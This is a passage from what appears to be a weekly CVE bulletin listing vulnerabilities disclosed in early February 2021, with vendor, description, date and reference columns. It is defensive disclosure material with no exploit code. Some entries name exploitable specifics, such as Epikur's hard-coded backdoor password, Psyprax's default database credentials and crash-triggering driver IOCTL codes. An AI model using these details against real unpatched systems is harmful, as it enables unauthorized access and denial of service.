In Eclipse Californium version 2.3.0 to 2.6.0, the certificate based (x509 and RPK) DTLS handshakes accidentally fails, because the DTLS server side sticks to a wrong internal state. That wrong internal state is set by a previous certificate based DTLS handshake failure with TLS parameter mismatch. The DTLS server side must be restarted to recover this. This allow clients to force a DoS. |
2021-02-03 |
not yet calculated |
CVE-2020-27222
CONFIRM |
electric_coin_company — zcashd
|
Electric Coin Company Zcashd before 2.1.1-1 allows attackers to trigger consensus failure and double spending. A valid chain could be incorrectly rejected because timestamp requirements on block headers were not properly enforced. |
2021-02-05 |
not yet calculated |
CVE-2020-8806
MISC |
electric_coin_company — zcashd
|
In Electric Coin Company Zcashd before 2.1.1-1, the time offset between messages could be leveraged to obtain sensitive information about the relationship between a suspected victim’s address and an IP address, aka a timing side channel. |
2021-02-05 |
not yet calculated |
CVE-2020-8807
MISC |
elliptic — elliptic
|
The package elliptic before 6.5.4 are vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed. |
2021-02-02 |
not yet calculated |
CVE-2020-28498
MISC
CONFIRM
CONFIRM
MISC |
epikur — epikur
|
An issue was discovered in Epikur before 20.1.1. The Epikur server contains the checkPasswort() function that, upon user login, checks the submitted password against the user password’s MD5 hash stored in the database. It is also compared to a second MD5 hash, which is the same for every user (aka a “Backdoor Password” of 3p1kursupport). If the submitted password matches either one, access is granted. |
2021-02-05 |
not yet calculated |
CVE-2020-10539
MISC |
epikur — epikur
|
An issue was discovered in Epikur before 20.1.1. A Glassfish 4.1 server with a default configuration is running on TCP port 4848. No password is required to access it with the administrator account. |
2021-02-05 |
not yet calculated |
CVE-2020-10537
MISC |
epikur — epikur
|
An issue was discovered in Epikur before 20.1.1. It stores the secret passwords of the users as MD5 hashes in the database. MD5 can be brute-forced efficiently and should not be used for such purposes. Additionally, since no salt is used, rainbow tables can speed up the attack. |
2021-02-05 |
not yet calculated |
CVE-2020-10538
MISC |
epson — iprojection
|
In Epson iProjection v2.30, the driver file (EMP_NSAU.sys) allows local users to cause a denial of service (BSOD) via crafted input to the virtual audio device driver with IOCTL 0x9C402402, 0x9C402406, or 0x9C40240A. DeviceEMPNSAUIO and DosDevicesEMPNSAU are similarly affected. |
2021-02-05 |
not yet calculated |
CVE-2020-9014
MISC
MISC
MISC |
epson — iprojection
|
In Epson iProjection v2.30, the driver file EMP_MPAU.sys allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C402406 and IOCtl 0x9C40240A. (0x9C402402 has only a NULL pointer dereference.) This affects DeviceEMPMPAUIO and DosDevicesEMPMPAU. |
2021-02-05 |
not yet calculated |
CVE-2020-9453
MISC
MISC
MISC |
freediskspace — freediskspace
|
This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js. |
2021-02-02 |
not yet calculated |
CVE-2020-7775
MISC |
gitea — gitea
|
Stack buffer overflow vulnerability in gitea 1.9.0 through 1.13.1 allows remote attackers to cause a denial of service (crash) via vectors related to a file path. |
2021-02-05 |
not yet calculated |
CVE-2021-3382
MISC |
gnome — evolution
|
** DISPUTED ** GNOME Evolution through 3.38.3 produces a “Valid signature” message for an unknown identifier on a previously trusted key because Evolution does not retrieve enough information from the GnuPG API. NOTE: third parties dispute the significance of this issue, and dispute whether Evolution is the best place to change this behavior. |
2021-02-01 |
not yet calculated |
CVE-2021-3349
MISC
MISC
MISC |
gnome — multiple_products
|
autoar-extractor.c in GNOME gnome-autoar through 0.2.4, as used by GNOME Shell, Nautilus, and other software, allows Directory Traversal during extraction because it lacks a check of whether a file’s parent is a symlink to a directory outside of the intended extraction location. |
2021-02-05 |
not yet calculated |
CVE-2020-36241
MISC
MISC |
harbor — harbor
|
In Harbor 2.0 before 2.0.5 and 2.1.x before 2.1.2 the catalog’s registry API is exposed on an unauthenticated path. |
2021-02-02 |
not yet calculated |
CVE-2020-29662
MISC |
hcl — digital_experience
|
HCL Digital Experience 9.5 containers include vulnerabilities that could expose sensitive data to unauthorized parties via crafted requests. These affect containers only. These do not affect traditional on-premise installations. |
2021-02-02 |
not yet calculated |
CVE-2020-14255
CONFIRM |
hcl — digital_experience
|
HCL Digital Experience 8.5, 9.0, and 9.5 exposes information about the server to unauthorized users. |
2021-02-02 |
not yet calculated |
CVE-2020-14221
CONFIRM |
hcl — digital_experience
|
In Digital Experience 8.5, 9.0, and 9.5, WSRP consumer is vulnerable to cross-site scripting (XSS). |
2021-02-02 |
not yet calculated |
CVE-2020-4081
CONFIRM |
hcl — onetest_ui
|
HCL OneTest UI V9.5, V10.0, and V10.1 does not perform authentication for functionality that either requires a provable user identity or consumes a significant amount of resources. |
2021-02-04 |
not yet calculated |
CVE-2020-14245
MISC |
helm — helm
|
Helm is open-source software which is essentially “The Kubernetes Package Manager”. Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. In Helm from version 3.0 and before version 3.5.2, there a few cases where data loaded from potentially untrusted sources was not properly sanitized. When a SemVer in the `version` field of a chart is invalid, in some cases Helm allows the string to be used “as is” without sanitizing. Helm fails to properly sanitized some fields present on Helm repository `index.yaml` files. Helm does not properly sanitized some fields in the `plugin.yaml` file for plugins In some cases, Helm does not properly sanitize the fields in the `Chart.yaml` file. By exploiting these attack vectors, core maintainers were able to send deceptive information to a terminal screen running the `helm` command, as well as obscure or alter information on the screen. In some cases, we could send codes that terminals used to execute higher-order logic, like clearing a terminal screen. Further, during evaluation, the Helm maintainers discovered a few other fields that were not properly sanitized when read out of repository index files. This fix remedies all such cases, and once again enforces SemVer2 policies on version fields. All users of the Helm 3 should upgrade to the fixed version 3.5.2 or later. Those who use Helm as a library should verify that they either sanitize this data on their own, or use the proper Helm API calls to sanitize the data. |
2021-02-05 |
not yet calculated |
CVE-2021-21303
MISC
MISC
CONFIRM |
huawei — gauess100
|
There is a logic vulnerability in Huawei Gauss100 OLTP Product. An attacker with certain permissions could perform specific SQL statement to exploit this vulnerability. Due to insufficient security design, successful exploit can cause service abnormal. Affected product versions include: ManageOne versions 6.5.1.1.B020, 6.5.1.1.B030, 6.5.1.1.B040, 6.5.1.SPC100.B050, 6.5.1.SPC101.B010, 6.5.1.SPC101.B040, 6.5.1.SPC200, 6.5.1.SPC200.B010, 6.5.1.SPC200.B030, 6.5.1.SPC200.B040, 6.5.1.SPC200.B050, 6.5.1.SPC200.B060, 6.5.1.SPC200.B070, 6.5.1RC1.B070, 6.5.1RC1.B080, 6.5.1RC2.B040, 6.5.1RC2.B050, 6.5.1RC2.B060, 6.5.1RC2.B070, 6.5.1RC2.B080, 6.5.1RC2.B090. |
2021-02-06 |
not yet calculated |
CVE-2021-22298
CONFIRM |
huawei — manageone
|
There has a CSV injection vulnerability in ManageOne 8.0.1. An attacker with common privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device. |
2021-02-06 |
not yet calculated |
CVE-2020-9205
CONFIRM |
| huawei — mate_30 |
There is a weak algorithm vulnerability in Mate 3010.0.0.203(C00E201R7P2). The protection is insufficient for the modules that should be protected. Local attackers can exploit this vulnerability to affect the integrity of certain module. |
2021-02-06 |
not yet calculated |
CVE-2021-22307
CONFIRM |
huawei — mate_30
|
Mate 30 10.0.0.203(C00E201R7P2) have a buffer overflow vulnerability. After obtaining the root permission, an attacker can exploit the vulnerability to cause buffer overflow. |
2021-02-06 |
not yet calculated |
CVE-2021-22301
CONFIRM |
huawei — mate_30
|
There is an out-of-bound read vulnerability in Mate 30 10.0.0.182(C00E180R6P2). A module does not verify the some input when dealing with messages. Attackers can exploit this vulnerability by sending malicious input through specific module. This could cause out-of-bound, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22306
CONFIRM |
huawei — mate_30
|
There is a buffer overflow vulnerability in Mate 30 10.1.0.126(C00E125R5P3). A module does not verify the some input when dealing with messages. Attackers can exploit this vulnerability by sending malicious input through specific module. This could cause buffer overflow, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22305
CONFIRM |
huawei — multiple_products
|
There is a denial of service (DoS) vulnerability in eCNS280 versions V100R005C00, V100R005C10. Due to a design defect, remote unauthorized attackers send a large number of specific messages to affected devices, causing system resource exhaustion and web application DoS. |
2021-02-06 |
not yet calculated |
CVE-2021-22292
CONFIRM |
huawei — multiple_products
|
Some Huawei products have an inconsistent interpretation of HTTP requests vulnerability. Attackers can exploit this vulnerability to cause information leak. Affected product versions include: CampusInsight versions V100R019C10; ManageOne versions 6.5.1.1, 6.5.1.SPC100, 6.5.1.SPC200, 6.5.1RC1, 6.5.1RC2, 8.0.RC2. Affected product versions include: Taurus-AL00A versions 10.0.0.1(C00E1R1P1). |
2021-02-06 |
not yet calculated |
CVE-2021-22293
CONFIRM |
huawei — multiple_products
|
There is a local privilege escalation vulnerability in some Huawei products. A local, authenticated attacker could craft specific commands to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege. Affected product versions include: ManageOne versions 6.5.0,6.5.0.SPC100.B210,6.5.1.1.B010,6.5.1.1.B020,6.5.1.1.B030,6.5.1.1.B040,6.5.1.SPC100.B050,6.5.1.SPC101.B010,6.5.1.SPC101.B040,6.5.1.SPC200,6.5.1.SPC200.B010,6.5.1.SPC200.B030,6.5.1.SPC200.B040,6.5.1.SPC200.B050,6.5.1.SPC200.B060,6.5.1.SPC200.B070,6.5.1RC1.B060,6.5.1RC2.B020,6.5.1RC2.B030,6.5.1RC2.B040,6.5.1RC2.B050,6.5.1RC2.B060,6.5.1RC2.B070,6.5.1RC2.B080,6.5.1RC2.B090,6.5.RC2.B050,8.0.0,8.0.0-LCND81,8.0.0.SPC100,8.0.1,8.0.RC2,8.0.RC3,8.0.RC3.B041,8.0.RC3.SPC100; NFV_FusionSphere versions 6.5.1.SPC23,8.0.0.SPC12; SMC2.0 versions V600R019C00,V600R019C10; iMaster MAE-M versions MAE-TOOL(FusionSphereBasicTemplate_Euler_X86)V100R020C10SPC220. |
2021-02-06 |
not yet calculated |
CVE-2021-22299
CONFIRM |
huawei — sound_x_product
|
There is an insufficient integrity check vulnerability in Huawei Sound X Product. The system does not check certain software package’s integrity sufficiently. Successful exploit could allow an attacker to load a crafted software package to the device. Affected product versions include:AIS-BW80H-00 versions 9.0.3.1(H100SP13C00),9.0.3.1(H100SP18C00),9.0.3.1(H100SP3C00),9.0.3.1(H100SP9C00),9.0.3.2(H100SP1C00),9.0.3.2(H100SP2C00),9.0.3.2(H100SP5C00),9.0.3.2(H100SP8C00),9.0.3.3(H100SP1C00). |
2021-02-06 |
not yet calculated |
CVE-2020-9118
CONFIRM |
| huawei — taurus-al00a_smartphones |
There is a use after free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module may refer to some memory after it has been freed while dealing with some messages. Attackers can exploit this vulnerability by sending specific message to the affected module. This may lead to module crash, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22304
CONFIRM |
huawei — taurus-al00a_smartphones
|
There is an out-of-bound read vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module does not verify the some input. Attackers can exploit this vulnerability by sending malicious input through specific app. This could cause out-of-bound, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22302
MISC |
huawei — taurus-al00a_smartphones
|
There is a pointer double free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). There is a lack of muti-thread protection when a function is called. Attackers can exploit this vulnerability by performing malicious operation to cause pointer double free. This may lead to module crash, compromising normal service. |
2021-02-06 |
not yet calculated |
CVE-2021-22303
CONFIRM |
ibm — powerha
|
IBM PowerHA 7.2 could allow a local attacker to obtain sensitive information from temporary directories after a discovery failure occurs. IBM X-Force ID: 189969. |
2021-02-05 |
not yet calculated |
CVE-2020-4832
XF
CONFIRM |
imagemagik — magikcore/gem
|
A flaw was found in ImageMagick in MagickCore/gem.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.10-56. |
2021-02-06 |
not yet calculated |
CVE-2021-20176
MISC |
intel — bluez
|
Improper buffer restrictions in BlueZ may allow an unauthenticated user to potentially enable denial of service via adjacent access. This affects all Linux kernel versions that support BlueZ. |
2021-02-02 |
not yet calculated |
CVE-2020-24490
CONFIRM |
intel — celeron_processor_4000_series
|
Out of bound read in BIOS firmware for 8th, 9th Generation Intel(R) Core(TM), Intel(R) Celeron(R) Processor 4000 Series Processors may allow an unauthenticated user to potentially enable elevation of privilege or denial of service via local access. |
2021-02-02 |
not yet calculated |
CVE-2020-8672
CONFIRM |
iobit — advanced_systemcare
|
The AscRegistryFilter.sys kernel driver in IObit Advanced SystemCare 13.2 allows an unprivileged user to send an IOCTL to the device driver. If the user provides a NULL entry for the dwIoControlCode parameter, a kernel panic (aka BSOD) follows. The IOCTL codes can be found in the dispatch function: 0x8001E000, 0x8001E004, 0x8001E008, 0x8001E00C, 0x8001E010, 0x8001E014, 0x8001E020, 0x8001E024, 0x8001E040, 0x8001E044, and 0x8001E048. DosDevicesAscRegistryFilter and DeviceAscRegistryFilter are affected. |
2021-02-05 |
not yet calculated |
CVE-2020-10234
MISC
MISC
MISC |
jenzabar — jenzabar
|
Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS. |
2021-02-06 |
not yet calculated |
CVE-2021-26723
MISC
MISC |
jetbrains — code_with_me
|
In JetBrains Code With Me before 2020.3, an attacker on the local network, knowing a session ID, could get access to the encrypted traffic. |
2021-02-03 |
not yet calculated |
CVE-2021-25755
MISC
MISC |
jetbrains — hub
|
In JetBrains Hub before 2020.1.12629, an authenticated user can delete 2FA settings of any other user. |
2021-02-03 |
not yet calculated |
CVE-2021-25759
MISC
MISC |
jetbrains — ktor
|
In JetBrains Ktor before 1.5.0, a birthday attack on SessionStorage key was possible. |
2021-02-03 |
not yet calculated |
CVE-2021-25761
MISC
MISC |
jetbrains — ktor
|
In JetBrains Ktor before 1.4.3, HTTP Request Smuggling was possible. |
2021-02-03 |
not yet calculated |
CVE-2021-25762
MISC
MISC |
jetbrains — youtrack
|
In JetBrains YouTrack before 2020.4.4701, improper resource access checks were made. |
2021-02-03 |
not yet calculated |
CVE-2021-25766
MISC
MISC |
lg — multiple_mobile_devices
|
An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. In preloaded applications, the HostnameVerified default is mishandled. The LG ID is LVE-SMP-200029 (February 2021). |
2021-02-04 |
not yet calculated |
CVE-2021-26687
MISC |
lg — wing_mobile_devices
|
An issue was discovered on LG Wing mobile devices with Android OS 10 software. The biometric sensor has weak security properties. The LG ID is LVE-SMP-200030 (February 2021). |
2021-02-04 |
not yet calculated |
CVE-2021-26688
MISC |
linkedin — oncall
|
LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the “No results found for” message in the search bar. |
2021-02-05 |
not yet calculated |
CVE-2021-26722
MISC |
linux — linux_kernel
|
A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support. |
2021-02-05 |
not yet calculated |
CVE-2021-26708
MLIST
MISC
MISC
MISC |
loklak — loklak
|
loklak is an open-source server application which is able to collect messages from various sources, including twitter. The server contains a search index and a peer-to-peer index sharing interface. All messages are stored in an elasticsearch index. In loklak less than or equal to commit 5f48476, a path traversal vulnerability exists. Insufficient input validation in the APIs exposed by the loklak server allowed a directory traversal vulnerability. Any admin configuration and files readable by the app available on the hosted file system can be retrieved by the attacker. Furthermore, user-controlled content could be written to any admin config and files readable by the application. This has been patched in commit 50dd692. Users will need to upgrade their hosted instances of loklak to not be vulnerable to this exploit. |
2021-02-02 |
not yet calculated |
CVE-2020-15097
MISC
CONFIRM |
max_secure — max_spyware_detector
|
In Max Secure Max Spyware Detector 1.0.0.044, the driver file (MaxProc64.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x2200019. (This also extends to the various other products from Max Secure that include MaxProc64.sys.) |
2021-02-05 |
not yet calculated |
CVE-2020-12122
MISC
MISC
MISC |
mechanize — mechanize
|
Mechanize is an open-source ruby library that makes automated web interaction easy. In Mechanize from version 2.0.0 and before version 2.7.7 there is a command injection vulnerability. Affected versions of mechanize allow for OS commands to be injected using several classes’ methods which implicitly use Ruby’s Kernel.open method. Exploitation is possible only if untrusted input is used as a local filename and passed to any of these calls: Mechanize::CookieJar#load, Mechanize::CookieJar#save_as, Mechanize#download, Mechanize::Download#save, Mechanize::File#save, and Mechanize::FileResponse#read_body. This is fixed in version 2.7.7. |
2021-02-02 |
not yet calculated |
CVE-2021-21289
MISC
MISC
CONFIRM
MISC |
micro_focus — application_performance_management
|
Persistent Cross-Site scripting vulnerability in Micro Focus Application Performance Management product, affecting versions 9.40, 9.50 and 9.51. The vulnerability could allow persistent XSS attack. |
2021-02-06 |
not yet calculated |
CVE-2021-22499
CONFIRM |
micro_focus — application_performance_management
|
Cross Site Request Forgery vulnerability in Micro Focus Application Performance Management product, affecting versions 9.40, 9.50 and 9.51. The vulnerability could be exploited by attacker to trick the users into executing actions of the attacker’s choosing. |
2021-02-06 |
not yet calculated |
CVE-2021-22500
CONFIRM |
nessus — ami
|
Nessus AMI versions 8.12.0 and earlier were found to either not validate, or incorrectly validate, a certificate which could allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. |
2021-02-06 |
not yet calculated |
CVE-2020-5812
MISC |
netgear — r7450_routers
|
This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R7450 1.2.0.62_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SOAP API endpoint, which listens on TCP port 80 by default. The issue results from the lack of proper access control. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-11559. |
2021-02-04 |
not yet calculated |
CVE-2020-27873
N/A
N/A |
netgear — r7450_routers
|
This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R7450 1.2.0.62_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from improper state tracking in the password recovery process. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-11365. |
2021-02-04 |
not yet calculated |
CVE-2020-27872
N/A
N/A |
new_media — smarty
|
An issue was discovered in New Media Smarty before 9.10. Passwords are stored in the database in an obfuscated format that can be easily reversed. The file data.mdb contains these obfuscated passwords in the second column. NOTE: this is unrelated to the popular Smarty template engine product. |
2021-02-05 |
not yet calculated |
CVE-2020-10375
MISC
MISC |
npm — npm
|
This affects all versions of package decal. The vulnerability is in the extend function. |
2021-02-04 |
not yet calculated |
CVE-2020-28450
MISC
MISC
MISC |
npm — npm
|
This affects all versions of package decal. The vulnerability is in the set function. |
2021-02-04 |
not yet calculated |
CVE-2020-28449
MISC
MISC
MISC |
nvidia — geforce_experience
|
NVIDIA GeForce Experience, all versions prior to 3.21, contains a vulnerability in GameStream (rxdiag.dll) where an arbitrary file deletion due to improper handling of log files may lead to denial of service. |
2021-02-05 |
not yet calculated |
CVE-2021-1072
CONFIRM |
oauth2_proxy — oauth2_proxy
|
OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the whitelist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a whitelist domain was configured for “.example.com”, the intention is that subdomains of example.com are allowed. Instead, “example.com” and “badexample.com” could also match. This is fixed in version 7.0.0 onwards. As a workaround, one can disable the whitelist domain feature and run separate OAuth2 Proxy instances for each subdomain. |
2021-02-02 |
not yet calculated |
CVE-2021-21291
MISC
MISC
CONFIRM
MISC |
october — october
|
An issue was discovered in October through build 471. It reactivates an old session ID (which had been invalid after a logout) once a new login occurs. NOTE: this violates the intended Auth/Manager.php authentication behavior but, admittedly, is only relevant if an old session ID is known to an attacker. |
2021-02-05 |
not yet calculated |
CVE-2021-3311
CONFIRM
MISC |
opmantek — open-audit
|
Opmantek Open-AudIT 4.0.1 is affected by cross-site scripting (XSS). When outputting SQL statements for debugging, a maliciously crafted query can trigger an XSS attack. This attack only succeeds if the user is already logged in to Open-AudIT before they click the malicious link. |
2021-02-05 |
not yet calculated |
CVE-2021-3333
MISC |
oppo — android_phone_with_mtk_chipset
|
OPPO Android Phone with MTK chipset and Android 8.1/9/10/11 versions have an information leak vulnerability. The “adb shell getprop ro.vendor.aee.enforcing” or “adb shell getprop ro.vendor.aee.enforcing” return no. |
2021-02-06 |
not yet calculated |
CVE-2020-11836
MISC |
pdf2json — pdf2json
|
Buffer overflow in pdf2json 0.69 allows local users to execute arbitrary code by converting a crafted PDF file. |
2021-02-05 |
not yet calculated |
CVE-2020-18750
CONFIRM
MISC |
podman — podman
|
Rootless containers run with Podman, receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.01) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards. |
2021-02-02 |
not yet calculated |
CVE-2021-20199
MISC
MISC
MISC
MISC |
polr — polr
|
Polr is an open source URL shortener. in Polr before version 2.3.0, a vulnerability in the setup process allows attackers to gain admin access to site instances, even if they do not possess an existing account. This vulnerability exists regardless of users’ settings. If an attacker crafts a request with specific cookie headers to the /setup/finish endpoint, they may be able to obtain admin privileges on the instance. This is caused by a loose comparison (==) in SetupController that is susceptible to attack. The project has been patched to ensure that a strict comparison (===) is used to verify the setup key, and that /setup/finish verifies that no users table exists before performing any migrations or provisioning any new accounts. This is fixed in version 2.3.0. Users can patch this vulnerability without upgrading by adding abort(404) to the very first line of finishSetup in SetupController.php. |
2021-02-01 |
not yet calculated |
CVE-2021-21276
MISC
MISC
CONFIRM |
pretashop — opart_devis
|
An Insecure Direct Object Reference (IDOR) vulnerability was found in Prestashop Opart devis < 4.0.2. Unauthenticated attackers can have access to any user’s invoice and delivery address by exploiting an IDOR on the delivery_address and invoice_address fields. |
2021-02-04 |
not yet calculated |
CVE-2020-16194
MISC |
psyprax — psyprax
|
An issue was discovered in Psyprax before 3.2.2. The Firebird database is accessible with the default user sysdba and password masterke after installation. This allows any user to access it and read and modify the contents, including passwords. Local database files can be accessed directly as well. |
2021-02-05 |
not yet calculated |
CVE-2020-10552
MISC |
psyprax — psyprax
|
An issue was discovered in Psyprax before 3.2.2. The file %PROGRAMDATA%Psyprax32PPScreen.ini contains a hash for the lockscreen (aka screensaver) of the application. If that entry is removed, the lockscreen is no longer displayed and the app is no longer locked. All local users are able to modify that file. |
2021-02-05 |
not yet calculated |
CVE-2020-10553
MISC |
psyprax — psyprax
|
An issue was discovered in Psyprax beforee 3.2.2. Passwords used to encrypt the data are stored in the database in an obfuscated format, which can be easily reverted. For example, the password AAAAAAAA is stored in the database as MMMMMMMM. |
2021-02-05 |
not yet calculated |
CVE-2020-10554
MISC |
question2answer — q2a
|
Question2Answer Q2A Ultimate SEO Version 1.3 is affected by cross-site scripting (XSS), which may lead to arbitrary remote code execution. |
2021-02-05 |
not yet calculated |
CVE-2021-3258
MISC
MISC
MISC |
| realtek — rtl8195a_wi-fi_module |
The function ClientEAPOLKeyRecvd() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an rtl_memcpy() operation, resulting in a stack buffer overflow which can be exploited for denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker does not need to know the network’s PSK. |
2021-02-03 |
not yet calculated |
CVE-2020-25857
CONFIRM |
realtek — rtl8195a_wi-fi_module
|
The function AES_UnWRAP() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for a memcpy() operation, resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. |
2021-02-03 |
not yet calculated |
CVE-2020-25855
CONFIRM |
realtek — rtl8195a_wi-fi_module
|
The function CheckMic() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an internal function, _rt_md5_hmac_veneer() or _rt_hmac_sha1_veneer(), resulting in a stack buffer over-read which can be exploited for denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker does not need to know the network’s PSK. |
2021-02-03 |
not yet calculated |
CVE-2020-25853
CONFIRM |
realtek — rtl8195a_wi-fi_module
|
The function DecWPA2KeyData() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an rtl_memcpy() operation, resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. |
2021-02-03 |
not yet calculated |
CVE-2020-25856
CONFIRM |
realtek — rtl8195a_wi-fi_module
|
The function DecWPA2KeyData() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an internal function, rt_arc4_crypt_veneer() or _AES_UnWRAP_veneer(), resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. |
2021-02-03 |
not yet calculated |
CVE-2020-25854
CONFIRM |
red_hat — red_hat
|
A flaw was found in the default configuration of dnsmasq, as shipped with Fedora versions prior to 31 and in all versions Red Hat Enterprise Linux, where it listens on any interface and accepts queries from addresses outside of its local subnet. In particular, the option `local-service` is not enabled. Running dnsmasq in this manner may inadvertently make it an open resolver accessible from any address on the internet. This flaw allows an attacker to conduct a Distributed Denial of Service (DDoS) against other systems. |
2021-02-06 |
not yet calculated |
CVE-2020-14312
MISC |
redwood — report2web
|
A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. |
2021-02-05 |
not yet calculated |
CVE-2021-26710
MISC |
redwood — report2web
|
A frame-injection issue in the online help in Redwood Report2Web 4.3.4.5 allows remote attackers to render an external resource inside a frame via the help/Online_Help/NetHelp/default.htm turl parameter. |
2021-02-05 |
not yet calculated |
CVE-2021-26711
MISC |
softmaker — office_planmaker
|
An exploitable integer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser perform arithmetic that may overflow which can result in an undersized heap allocation. Later when copying data from the file into this allocation, a heap-based buffer overflow will occur which can corrupt memory. These types of memory corruptions can allow for code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-13579
MISC |
softmaker — office_planmaker
|
A memory corruption vulnerability exists in the Excel Document SST Record 0x00fc functionality of SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). A specially crafted malformed file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-13586
MISC |
softmaker — office_planmaker
|
A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0004 and 0x0015, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). |
2021-02-04 |
not yet calculated |
CVE-2020-27249
MISC |
softmaker — office_planmaker
|
A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0003 and 0x0014, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). |
2021-02-04 |
not yet calculated |
CVE-2020-27248
MISC |
softmaker — office_planmaker
|
A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0002, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). |
2021-02-04 |
not yet calculated |
CVE-2020-27247
MISC |
softmaker — office_planmaker
|
An exploitable heap-based buffer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser to explicitly trust a length from a particular record type and use it to write a 16-bit null relative to a buffer allocated on the stack. Due to a lack of bounds-checking on this value, this can allow an attacker to write to memory outside of the buffer and controllably corrupt memory. This can allow an attacker to earn code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability. |
2021-02-04 |
not yet calculated |
CVE-2020-13580
MISC |
| solarwinds — orion_platform |
SolarWinds Orion Platform before 2020.2.4, as used by various SolarWinds products, installs and uses a SQL Server backend, and stores database credentials to access this backend in a file readable by unprivileged users. As a result, any user having access to the filesystem can read database login details from that file, including the login name and its associated password. Then, the credentials can be used to get database owner access to the SWNetPerfMon.DB database. This gives access to the data collected by SolarWinds applications, and leads to admin access to the applications by inserting or changing authentication data stored in the Accounts table of the database. |
2021-02-03 |
not yet calculated |
